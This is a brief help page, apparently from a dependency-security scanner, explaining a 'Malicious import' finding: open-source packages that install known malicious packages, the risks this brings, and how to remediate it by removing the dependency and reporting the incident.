Malicious import
Background
An open-source package that attempts to install a known malicious package could be a software component or library that, when executed or included in a software project, initiates actions to download and install another package that is recognized as being malicious or harmful. This behavior may be performed intentionally by the package author or may be the result of compromised or unauthorized modifications to the package code or dependencies.
Problem
Malicious actors may attempt to conceal the true intent of the open-source package by obfuscating or disguising the code responsible for initiating the installation of the malicious package.
The installation of known malicious packages poses significant security risks to users and organizations, including exposure to malware, data breaches, financial losses, reputational damage, and legal liabilities.
Remediation
Remove the package from your dependencies list, disconnect affected devices from the network and report the incident to the relevant authorities in your organization.
See
Updated about 1 month ago